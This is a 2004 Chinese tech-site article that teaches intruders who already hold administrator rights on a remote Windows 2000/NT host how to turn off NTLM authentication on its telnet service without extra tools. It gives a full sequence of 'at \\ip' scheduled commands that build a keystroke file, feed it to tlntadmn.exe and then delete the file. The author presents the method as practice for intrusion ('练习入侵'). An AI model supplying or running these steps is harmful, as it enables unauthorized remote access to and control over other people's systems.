您的位置:首页网络冲浪网络技术 → 不需要任何工具,远程屏蔽telnet服务的ntlm认证

不需要任何工具,远程屏蔽telnet服务的ntlm认证

时间:2004/10/8 16:46:00来源:本站整理作者:蓝点我要评论(0)

    很多人获得上传文件的权限和管理员权限以后想启动远程的tlelnet服务,但是却碰到
讨厌的NTLM认证,对于这种情况,我们很多时候就采用上传文件(比如NTLM.exe),然后at远程定时执行,如果手头上没有这样的工具怎么办呢?
可以这么做:
大家可以看一下win2000和nt4自带tlntadmn这个命令,他是用来控制台修改telnet设置的,很可惜这是一个控制台的交互式工具,所以at命令没有办法直接调用。
现在我们执行一下tlntadmn,然后按照以下的顺序操作
停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0)
现在大家记住了吧,先后顺序是5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车)
线在我们这么做
at \\ip time "echo 5 > c:\t.txt"
at \\ip time "echo 3 >> c:\t.txt"
at \\ip time "echo 7 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo 4 >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
呵呵按照上面的顺序一步一步执行
当然你本地做一个t.txt文件也可以,内容如下:
5
3
7
y
0
y
0
4
0
每个字符后面要加回车,然后copy t.txt \\ip\c$
然后再
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
很简单的dos重定向原理,t.txt就相当于手工输入一系列的操作,完成tlntadmn的交互
呵呵

当然,你们可以在本地试验好以后再发到远程主机去
我写的那个sqlcandy远程启动telnet服务,删除ntlm认证就是这么做的
当然有工具是最好了
但是劝大家练习入侵的时候尽量不要使用工具,这样对自己没有帮助的 .:)


相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 小米路由器设置教程附共享有线路由后再接无TP-link无线路由器设置D-Link DI-524M路由器

最新文章 百度网盘解除黑名单摆百度不收录怎么办 百度 10款免费开源图表插件推荐ssid隐藏了怎么办?隐藏SSID的无线网络如何OneDNS设置教程两块网卡访问不同网络案例分享

人气排行 宽带连接图标不见了怎么办 宽带连接图标怎么dell 服务器开机总是提示按F1才能进系统解决dns是什么?dns怎么设置?buffalo无线路由器设置图文教程哪种WIFI无线各种加密方式更安全?ADSL宽带连接错误(720)及解决方法双网卡同时上内外网设置教程公司网络综合布线图解